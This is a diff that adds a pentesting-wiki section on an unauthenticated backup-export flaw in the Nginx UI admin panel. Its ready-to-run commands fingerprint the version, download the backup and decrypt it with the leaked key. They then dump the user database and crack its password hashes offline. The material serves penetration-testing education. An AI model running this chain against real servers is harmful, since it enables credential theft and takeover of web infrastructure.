diff --git a/src/network-services-pentesting/pentesting-web/nginx.md b/src/network-services-pentesting/pentesting-web/nginx.md
index 979580ffa27..fc04c324574 100644
--- a/src/network-services-pentesting/pentesting-web/nginx.md
+++ b/src/network-services-pentesting/pentesting-web/nginx.md
@@ -379,6 +379,59 @@ rg -n "keepalive_requests" /etc/nginx/
 
 Hosts that reveal unusually high values for those directives are prime targets: one HTTP/2 client can loop through stream creation and instant `RST_STREAM` frames to keep CPU pegged without tripping the concurrency cap.
 
+## Nginx UI pre-auth backup export + crypto material leakage
+
+**Nginx UI** is a separate admin panel for nginx, not the nginx daemon itself. In **Nginx UI < 2.3.3**, the backup export endpoint may be reachable **without authentication** and the response can also leak the **AES-256-CBC key and IV** needed to decrypt the backup via the `X-Backup-Security` header. This turns an "encrypted backup download" into immediate **credential / token / private-key disclosure**.
+
+### Fast version fingerprinting from SPA assets
+
+If the login page is a JS-heavy SPA, pull the main bundle from `/` and look for a dedicated version chunk:
+
+```bash
+curl -s http://admin.example/ | grep -oP 'assets/index-[^"]+\.js'
+curl -s http://admin.example/assets/index-<hash>.js | grep -oP 'version[-\\w]*\\.js'
+curl -s http://admin.example/assets/version-<hash>.js
+```
+
+On vulnerable Nginx UI builds this often returns a literal such as `const t="2.3.2"`, which is enough to match the vulnerable range before authenticating.
+
+### Check exposed API endpoints and pull the backup
+
+Even when most `/api/*` routes return `403`, test backup-style endpoints directly:
+
+```bash
+curl -s http://admin.example/api/install
+curl -s -D headers.txt -o backup.zip http://admin.example/api/backup
+grep -i '^X-Backup-Security:' headers.txt
+unzip -l backup.zip
+```
+
+If vulnerable, `X-Backup-Security` contains `base64(key):base64(iv)`. Decode both values and confirm the expected lengths (**32-byte key**, **16-byte IV**):
+
+```bash
+KEY_B64='<base64-key>'; IV_B64='<base64-iv>'
+KEY_HEX=$(printf '%s' "$KEY_B64" | base64 -d | xxd -p -c 0)
+IV_HEX=$(printf '%s' "$IV_B64" | base64 -d | xxd -p -c 0)
+unzip backup.zip -d backup
+openssl enc -aes-256-cbc -d -in backup/hash_info.txt -out hash_info.txt -K "$KEY_HEX" -iv "$IV_HEX"
+openssl enc -aes-256-cbc -d -in backup/nginx.zip -out nginx_dec.zip -K "$KEY_HEX" -iv "$IV_HEX"
+openssl enc -aes-256-cbc -d -in backup/nginx-ui.zip -out nginx-ui_dec.zip -K "$KEY_HEX" -iv "$IV_HEX"
+```
+
+After decryption, inspect the recovered nginx configs and the Nginx UI application data. A common post-exploitation path is:
+
+- Extract reverse-proxy and vhost details from `nginx_dec.zip`
+- Inspect `nginx-ui_dec.zip` for `app.ini`, `database.db`, API tokens, or certificate material
+- Dump the SQLite `users` table and crack recovered password hashes offline
+
+```bash
+unzip nginx-ui_dec.zip -d nginx-ui
+sqlite3 nginx-ui/database.db 'select name,password from users;'
+hashcat -m 3200 hashes.txt <wordlist>
+```
+
+This pattern is worth testing in other admin products too: **an unauthenticated "encrypted" export is still plaintext disclosure if the response leaks the decryption material or stores it alongside the archive.**
+
 ## Try it yourself
 
 Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself!
@@ -405,6 +458,9 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
 - [**https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html**](https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html)
 - [**https://mailman.nginx.org/pipermail/nginx-announce/2025/NYEUJX7NCBCGJGXDFVXNMAAMJDFSE45G.html**](https://mailman.nginx.org/pipermail/nginx-announce/2025/NYEUJX7NCBCGJGXDFVXNMAAMJDFSE45G.html)
 - [**https://www.f5.com/company/blog/nginx/http-2-rapid-reset-attack-impacting-f5-nginx-products**](https://www.f5.com/company/blog/nginx/http-2-rapid-reset-attack-impacting-f5-nginx-products)
+- [**https://0xdf.gitlab.io/2026/04/01/htb-snapped.html**](https://0xdf.gitlab.io/2026/04/01/htb-snapped.html)
+- [**https://nvd.nist.gov/vuln/detail/CVE-2026-27944**](https://nvd.nist.gov/vuln/detail/CVE-2026-27944)
+- [**https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762**](https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762)
 
 
 {{#include ../../banners/hacktricks-training.md}}